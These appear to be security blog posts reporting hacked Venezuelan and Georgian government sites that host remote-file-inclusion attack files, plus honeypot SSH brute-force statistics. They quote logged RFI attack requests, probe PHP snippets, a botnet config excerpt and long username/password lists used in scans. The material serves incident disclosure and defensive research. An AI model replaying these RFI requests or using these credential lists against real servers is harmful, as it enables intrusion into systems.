Venezuela Government site hacked and spreading malware

Since we have been noticing that full-disclosure works, we will continue with that.

We have detected in our honeypots that since January the site www.miranda.gov.ve (from the Venezuela state of Miranda) has been hosting malware and their IP also scanning our honeypots.

We attempted to contact them a few times without any reply, so let’s see if anyone will take notice now.

What we saw initially was a few files being used on RFI attacks:

a.b.231.227 – - [16/Feb/2010:01:32:50 -0200] “GET /show.php?path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1″ 200 36 “-” “Mozilla/5.0″
a.b.231.227 – - [16/Feb/2010:01:32:56 -0200] “GET /xxx.php?path=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1″ 200 36 “-” “Mozilla/5.0″

Later we also saw them attacking our system (190.9.130.13 is their IP address):

190.9.130.13 – - [19/Feb/2010:06:13:17 -0200] “GET /tonuke.php?filnavn=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1″ 200 36 “-” “Mozilla/5.0″
190.9.130.13 – - [19/Feb/2010:06:13:17 -0200] “GET /xxx.php?filnavn=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1″ 200 36 “-” “Mozilla/5.0″

These are some of the files we found so far:

$ lynx –source –dump http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt
$ lynx –source –dump http://www.miranda.gov.ve/modules/mod_sections/id1.txt
< ? php /* Fg21ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fh21ID */

Note that this is just what was reported from our honeypot systems (all automated). We only go deeper in the analysis when our clients are affected.

Also, one thing that most people don’t realize is that if the attackers are able to upload any file to the server and run commands in there, they can also steal confidential information, steal passwords, inject malware to visitors (via javascript), etc.

Georgia government sites hacked (and spreading malware)

*UPDATE: A few hours after this post, they removed the malware from justice.gov.ge and other sites. I am glad we had some effect.

You know, you would think that after all the attacks that Georgia suffered in 2008 they would be more careful about the security of their sites.

Well, not really. Even after I sent a bunch of emails to all their addresses that I could find and requested on twitter for contacts in the .ge government, nobody replied and they are still hacked, spreading malware and attacking other systems.

It doesn’t look like it is being caused by the Russians or anything like that. And the attackers this time didn’t defaced their web page. They just added some malware and scripts to attack others.

How do I know? We run multiple honeypots to detect web-based attacks and malware. And guess who started attacking us?

Analysis

I started seeing the first attacks on January 12th, trying to load RFI (remote files) from psg.gov.ge:

a.b.147.154 – - [12/Jan/2010:14:05:43 -0200] “GET ///?_SERVER[DOCUMENT_ROOT]=http://www.psg.gov.ge//album/respon1.txt? HTTP/1.1″ 200 6312 “-” “Mozilla/5.0″
a.b..147.154 – - [12/Jan/2010:14:05:46 -0200] “GET /xxx//?_SERVER[DOCUMENT_ROOT]=http://www.psg.gov.ge//album/respon1.txt? HTTP/1.1″ 200 7281 “-” “Mozilla/5.0″

A few days later I started seeing more attacks using malware hosted from www.justice.gov.ge

a.b.63.102 – - [14/Jan/2010:03:04:23 -0200] “GET /xxx*.php?page=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1″ 200 36 “-” “Mozilla/5.0″

That’s when I decided to look deeper at the issue. The respon1.txt is a common file used on RFI attacks:

$ lynx –dump –source http://www.justice.gov.ge//album/respon1.txt
< ?php /* Fx29ID */ echo("FeeL"."CoMz"); echo("FeeL"."CoMz"); /* Fx29ID */ ?>

Then I went to look at this “album” directory and that really shocked me. When you visit http://www.justice.gov.ge/album/ you can see a full collection of malware:


From the http://www.justice.gov.ge/album/bot.txt showing credentials to control a botnet, to flooding tools, remote shells, they got everything.

servban=array(“irc.allnetwork.org”,”",”");
$bot['admin']=”E_motz”;
$bot['pass']=”gila”;
$bot['inick']=”identnick”;
$bot['pnick']=”passwordnick”;
$bot['basechan']=”#vanjava”;

A look at the top of the simbah.txt shows a “funny” message: http://www.justice.gov.ge/album/simbah.txt

# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%
# % private hackers pwned your box %
# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%

Even a remote proxy is there at http://www.justice.gov.ge/album/proxy.tgz

Attacking others

If that was not bad enough, by the end of January I started to see their own IP addresses attacking others:

87.253.63.102 – - [01/Feb/2010:04:41:09 -0200] “GET //include/write.php?dir=http://www.gk-rus.ru/images/laknat/.id?? HTTP/1.1″ 200 36 “-” “libwww-perl/5.805″
87.253.63.102 – - [01/Feb/2010:04:41:09 -0200] “GET /xxx/include/write.php?dir=http://www.gk-rus.ru/images/laknat/.id?? HTTP/1.1″ 200 36 “-” “libwww-perl/5.805″
81.95.173.72 – - [23/Jan/2010:16:07:29 -0200] “GET /xxx/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS;=&mosConfig;_absolute_path=http://krupuk.110mb.com/res1.txt?%20? HTTP/1.1″ 200 36 “-” “Mozilla/5.0″

So, at the end, we have some sites from the Georgia government hosting malware and these 4 attacking others:

www.psg.gov.ge – 87.253.63.102 (redirects now to justice.gov.ge)
www.justice.gov.ge – 87.253.63.102
moh.gov.ge – 81.95.173.72
mail.justice.gov.ge – 87.253.63.100

If you have any contact at the Georgie government, let them know about this post. I have been trying to speak with someone since January without success. Maybe with some extra exposure they will notice and fix it.

Honeypot analysis – Looking at SSH scans

An integral part of the Sucuri project is to research and monitor current attacks as a way to improve our defense techniques. To achieve that, we have been running a few Honeypots for almost a year and collecting data from the attacks used and learning from them.

After a year, I think we are ready to start sharing the information we have learned…

The first step was to create a page with information about the systems involved on web attacks. We also have two blacklists updated daily, the first one is composed of the domains that are hosting the malware/php/perl scripts, while the second blacklist is composed of the IP addresses that are actively scanning our honeypots. You can check them out, plus the tools used at Blacklist and Research based on web attacks.

Now, the second step is to write about the attacks we are seeing to help educate others…

Looking at SSH scans

All our honeypots have a modified SSH server running where we collect every connection attempt, user name and password used and everything typed if the attacker gets access via SSH. During the course of 1 year, we recorded more than 1,600 different SSH scans to our systems. The data bellow is only for the last few months and the first number you see is in how many different scans it was logged.

TOP 50 user/password combination

# USER, PASS
16 oracle, oracle
13 root, root
12 root, abc123
12 root, 123456
11 tester, test
10 uploader, uploader
10 test123, spam
10 qwerty, testuser
10 qazwsxedc, tester
10 password, test1
10 password, john
10 password, cstrike
10 123456, testuser
10 123456, test2
10 123456, raqbackup
10 123456, gamer
10 123456, cvsadm
10 123456, calendar
10 123456, bill
9 root, 123qwe
9 mike, mike
9 agata, agata
8 test, test123
8 root, qwerty
8 marketing, marketing
8 johan, johan
8 joan, joan
8 ftp, ftp123
8 ftp, ftp
8 carla, carla
8 bruno, bruno
8 admin, admin
8 123, user
7 test, test
7 tech, tech
7 root, password
7 ronaldo, ronaldo
7 raimundo, raimundo
7 nick, nick
7 max, max
7 library, library
7 jeff, jeff
7 internet, internet
7 hans, hans
7 grace, grace
7 ftp, ftpuser
7 frank, frank
7 francisco, francisco
7 francis, francis

It is interesting to note that in the first column, we have the user name and we see many entries for 123456 with the password of testuser or bill. My guess? Someone messed up the password lists and inverted the order… Anyone have ideas?

Top 50 User names used

# USER
241 root
221 password
100 admin
87 test
87 qwerty
72 www
68 123
67 000000
66 111111
65 1234567
63 asdfgh
59 testing
59 test123
58 abc123
53 pass123
52 qazwsx
50 tester
48 server
47 abcdef
46 testing123
46 testing1
46 qazwsxedc
45 zxcvbnm
45 zxcvbn
45 testtest
40 oracle
39 ftp
33 test1
32 passwd
31 tester123
31 tester1
31 pass
30 pgsql
29 operator
28 dan
27 administrator
26 master
26 bin
25 oper
24 nobody
22 backup
21 postgres
21 mail
21 daemon
21 87654321
21 654321
20 office
19 test2
18 ts
17 mike
17 guest
16 monica

TOP 50 Passwords used

# PASS
1427 root
346 test
305 123456
264 testuser
259 tester
242 test123
241 testing
240 test1
236 test2
230 test4
230 test3
113 12345
106 admin
75 user
69 nobody
69 123
65 1234
63 nick
59 webadmin
50 webmaster
49 oracle
48 web
46 password
43 news
42 info
40 sysadm
37 mysql
36 eqidemo
36 cvsadm
34 spam
31 administrator
30 uploader
28 lp
27 system
27 john
27 jack
27 fred
27 bill
26 visitor
26 daily
26 cstrike
25 techsupport
25 sql
25 smtp
23 qwerty
23 michael
22 weblogic
22 webalizer
22 toor
22 sys

Complex password logged

Most of the scan attempts were using very common passwords, but some of them had really complex passwords that I can only imagine that are used as backdoors or as default passwords for some common systems. Anyone have clues? I “googled” and didn’t find anything..

# USER, PASS
5 software, cvsroot
5 soft123, sourceforge
5 rosymdelfin, conautoveracruz
1 root, tiganilaflorinteleorman
1 belltrix, spaf@r?_ene59p9e9rewr*katr
1 tiganilaflorinteleorman, root
1 morrigan, siamouziesw7unla70lafrl3t0l3frle4lu
1 sadmin, &thecentercannothold;&
1 saddleman357, safe
1 sachin, f9uthlavIaPhlawroEXi
1 admin, b#5rum$ph!r!Keyufawre?a3r6
1 miquelfi, B|*Nsq|TO$~b
1 root, an0th3rd@y
1 admin, 63375312012a
1 root, zEfrephaq5qAnedufrethekuW
1 root, z1x2c3v4b5n6
1 root, xsw21qaz
1 root, wiu2ludrlamoatiuTriu
1 root, teiubescdartunumaiubestiasacahaidesaterminam
1 root, siamouziesw7UNla70lafrl3t0l3frlE4lU
1 root, rough46road15
1 root, fiatmx1q2w3e
1 root, empire12
1 root, efKO1$4?
1 root, eempire99
1 root, discovery
1 root, dave
1 root, d3lt4f0rc3
1 root, celes3cat
1 root, bleCroujouwLUswOEdrlAfo6w
1 root, bUspamaxegEGuyU52PEt6estU
1 root, asdfghjkl
1 root, apple
1 root, apache
1 root, an0th3rd@y
1 root, admin321321
1 root, admin1
1 root, admin
1 root, abcd1234
1 root, a1s2d3f4g5h6
1 root, WrIaRoeThIespOeh3AwriufLetiu7Tlu11u
1 root, QT3CUCCj
1 root, Pr99*35a!ra-EwruvU3E@rAtUk
1 root, N6a4t4u8OEwiaW8i7HLaqLaki
1 root, Liteon81
1 root, B_$Aj3y3#UCraveVE5e23er@P4
1 root, BP5FbGRr
1 root, 63375312012a
1 root, 1z2x3c4v5b6n
1 root, 1qaz2wsx
1 root, 1q2w3e4r5t6y
1 root, 1q2w3e4r5t
1 root, 1q2w3e4r
1 root, 1a2s3d4f5g6hy
1 root, +#SGU9&rbf-;#
1 root, !@#$%^&*(
1 root, !@#$%
1 root, !@#$
1 root, !@#
1 root, +#sgu9&rbf-;#
1 root, )(*&^%$#@!
1 root, &thecentercannothold;&
1 root, %5%7%4%5%1%4%8%7
1 oracle, $changeme$
1 nobody, $changeme$
1 news, $changeme$
1 $ passwd
1 root, !@#$%^&*()
1 root, !!!
1 qeqawrexudaducu7eyuswacez, root
1 qazwsxeds, root
1 qazwsxedc, root
1 qazwsx, user
1 q16060502141279, q16060502141279
1 pr99*35a!ra-ewruvu3e@ratuk, admin
1 n6a4t4u8oewiaw8i7hlaqlaki, root
1 admin, miemleh9esplawriuthiewias
1 admin, J34a47nu
1 zefrephaq5qanedufrethekuw, sadmin
1 zander, zechsmerquise88
1 root, zaxscd13524
1 zander, zechsmerquise88
1 yxwvutseqponmlkjihgfedcba, root
1 yuneneli, z11060510412854
1 yourdotw, ip46262
1 xgridagent, xgridcontroller
1 xj050i7bfa, root
1 wriaroethiespoeh3awriufletiu7tlu11u, kjetter
1 root, wolfiz0r@
1 admin, wolfiz0r@
1 wmassma, wolf
1 wlp, wmassma
1 wlan, wlp
1 wkoweg, wlan
1 root, wiu2ludrlamoatiutriu
1 ups650cl, lbjlive
1 root, unlocker
1 u33977059, ubuntu
1 u231006, u33977059
1 u208417, u231006
1 u207114, u208417
1 tyson, u207114
1 ska, skandinavia
1 sjfconsulting, ska
1 sjaekel, sjfconsulting

That’s it.. If you want me to run more queries or generate more stats, let me know and I will update this post.